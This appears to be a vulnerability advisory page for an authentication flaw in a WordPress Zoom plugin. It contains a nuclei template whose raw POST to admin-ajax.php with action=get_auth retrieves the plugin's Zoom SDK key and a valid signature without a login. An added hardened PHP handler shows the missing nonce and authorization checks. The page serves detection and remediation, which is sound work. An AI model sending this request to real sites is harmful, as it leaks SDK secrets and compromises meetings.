Video Conferencing with Zoom API < 4.6.6 - Unauthenticated SDK Signature Generation

Reported by ProjectDiscovery, 04 Jul 2026 03:00:48. Type: nuclei. Source: github.com

Unauthenticated attackers can forge Zoom SDK signatures and obtain the SDK key because nonce verification is disabled in an AJAX handler of the WordPress plugin below version 4.6.6.

Code
id: CVE-2026-1368

info:
  name: Video Conferencing with Zoom API < 4.6.6 - Unauthenticated SDK Signature Generation
  author: 0x_Akoko
  severity: high
  description: |
    Zoom WordPress plugin < 4.6.6 contains a broken authentication caused by disabled nonce verification in an AJAX handler, letting unauthenticated attackers generate valid Zoom SDK signatures and retrieve the Zoom SDK key.
  impact: |
    Unauthenticated attackers can generate valid SDK signatures and retrieve the Zoom SDK key, potentially compromising meeting security.
  remediation: |
    Update to version 4.6.6 or later.
  reference:
    - https://wpscan.com/vulnerability/218e6655-c5aa-4bce-86b2-cad3bb20020c/
    - https://wordpress.org/plugins/video-conferencing-with-zoom-api/
    - https://plugins.trac.wordpress.org/browser/video-conferencing-with-zoom-api/
  classification:
    cve-id: CVE-2026-1368
    epss-score: 0.01211
    epss-percentile: 0.64748
    cwe-id: CWE-862
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
  metadata:
    verified: true
    max-request: 2
    fofa-query: body="/wp-content/plugins/video-conferencing-with-zoom-api/"
  tags: cve,cve2026,wordpress,wp-plugin,wp,zoom,vczapi,unauth,intrusive

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/video-conferencing-with-zoom-api/README.txt"

    extractors:
      - type: regex
        name: version
        group: 1
        regex:
          - '(?i)Stable tag:\s*([\d.]+)'
        internal: true

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Video Conferencing with Zoom")'
          - 'compare_versions(version, "<4.6.6")'
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=get_auth&meeting_id=123456789

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "\"success\":true", "\"sig\":\"eyJ", "\"type\":\"sdk\"")'
        condition: and

    extractors:
      - type: json
        name: sdk_key
        json:
          - '.data.key'

      - type: json
        name: sdk_signature
        json:
          - '.data.sig'
# digest: 490a0046304402200a6cedf1b9840c20653617b267bd89914111bb7ef8d6954b6e5ba54a41a2310702204f1560cb60c68d9de23a51c7731995e83624d4c37cd3ea4904bae5981f7682e3:922c64590222798bb761d5b6d8e72950
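The template above detects the condition the description names: an admin-ajax.php action that hands out an SDK signature without verifying its nonce. The following PHP is an added, hypothetical handler written for this page; it is not the plugin's code, and every identifier prefixed `example_` (hook callbacks, option names, the nonce action) is invented. It shows the controls such a handler needs, in order: the nonce check that the vulnerable versions skipped, an authorization check on top of it (a nonce alone is CSRF protection, not an identity check, which is why the weakness is classed as CWE-862 "missing authorization"), input validation of the meeting id, and signing the JWT server-side so the SDK secret never reaches the client. The claim names in the payload are assumed from Zoom's Meeting SDK JWT format and should be checked against current Zoom documentation.

```php
<?php
/**
 * Hypothetical hardened handler for a "get_auth" admin-ajax.php action.
 * Added illustration for CVE-2026-1368; NOT the plugin's own code.
 * All names prefixed "example_" are invented for this example.
 */

// Both hooks route POST /wp-admin/admin-ajax.php with action=get_auth here.
// The "nopriv" hook is what makes the endpoint reachable without a login,
// so the handler itself must enforce every check it relies on.
add_action( 'wp_ajax_get_auth',        'example_get_auth_handler' );
add_action( 'wp_ajax_nopriv_get_auth', 'example_get_auth_handler' );

// The page that embeds the meeting client hands the nonce to its script,
// e.g. via wp_localize_script(); the client then posts it back as "nonce".
function example_get_auth_nonce() {
    return wp_create_nonce( 'example_get_auth' ); // assumed action name
}

function example_get_auth_handler() {
    // 1. CSRF check. In the vulnerable versions this verification was
    //    disabled, so any origin could call the action. With $die = false
    //    the function returns false instead of exiting, which lets us
    //    answer with a structured JSON error.
    if ( ! check_ajax_referer( 'example_get_auth', 'nonce', false ) ) {
        wp_send_json_error( array( 'message' => 'Invalid or missing nonce.' ), 403 );
    }

    // 2. Authorization. A valid nonce only proves the request came from a
    //    page that rendered it; it says nothing about who is asking.
    //    Require a logged-in user with at least the "read" capability.
    if ( ! is_user_logged_in() || ! current_user_can( 'read' ) ) {
        wp_send_json_error( array( 'message' => 'Not authorized.' ), 403 );
    }

    // 3. Input validation: Zoom meeting IDs are 9 to 11 digits.
    $meeting_id = isset( $_POST['meeting_id'] )
        ? sanitize_text_field( wp_unslash( $_POST['meeting_id'] ) )
        : '';
    if ( ! preg_match( '/^\d{9,11}$/', $meeting_id ) ) {
        wp_send_json_error( array( 'message' => 'Invalid meeting id.' ), 400 );
    }

    // 4. Sign server-side. The secret is read from site options and is
    //    never included in the response; the role is fixed to attendee (0)
    //    rather than taken from the request, so a caller cannot ask to be host.
    $sdk_key    = get_option( 'example_zoom_sdk_key' );    // assumed option name
    $sdk_secret = get_option( 'example_zoom_sdk_secret' ); // assumed option name
    $now        = time();
    $claims     = array(                 // claim names assumed from Zoom's Meeting SDK JWT
        'appKey'   => $sdk_key,
        'sdkKey'   => $sdk_key,
        'mn'       => $meeting_id,
        'role'     => 0,
        'iat'      => $now,
        'exp'      => $now + 2 * HOUR_IN_SECONDS,
        'tokenExp' => $now + 2 * HOUR_IN_SECONDS,
    );
    $sig = example_sign_hs256( $claims, $sdk_secret );

    // Same response shape the template matches on: success, a JWT in "sig"
    // (base64url of {"alg":...} always starts with "eyJ"), and type "sdk".
    wp_send_json_success( array( 'sig' => $sig, 'key' => $sdk_key, 'type' => 'sdk' ) );
}

// Base64url without padding, as required by the JWT (RFC 7519) encoding.
function example_base64url( $data ) {
    return rtrim( strtr( base64_encode( $data ), '+/', '-_' ), '=' );
}

// Minimal HS256 JWT signer: header.payload.HMAC-SHA256(header.payload).
function example_sign_hs256( array $claims, $secret ) {
    $header  = example_base64url( wp_json_encode( array( 'alg' => 'HS256', 'typ' => 'JWT' ) ) );
    $payload = example_base64url( wp_json_encode( $claims ) );
    $mac     = hash_hmac( 'sha256', "$header.$payload", $secret, true );
    return "$header.$payload." . example_base64url( $mac );
}
```

The order of the checks matters for review: the nonce check is the control the advisory says was disabled, but on an action that is also registered under `wp_ajax_nopriv_`, re-enabling it alone still lets any visitor who can load a page carrying the nonce obtain a signature, so the login and capability check is what actually closes the missing-authorization class, and the fixed attendee role keeps a client from requesting a host-level token.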


Vulners AI Score: 5.9 (Medium risk), current as of 29 Apr 2026 00:56
CVSS 3.1: 7.5
EPSS: 0.01211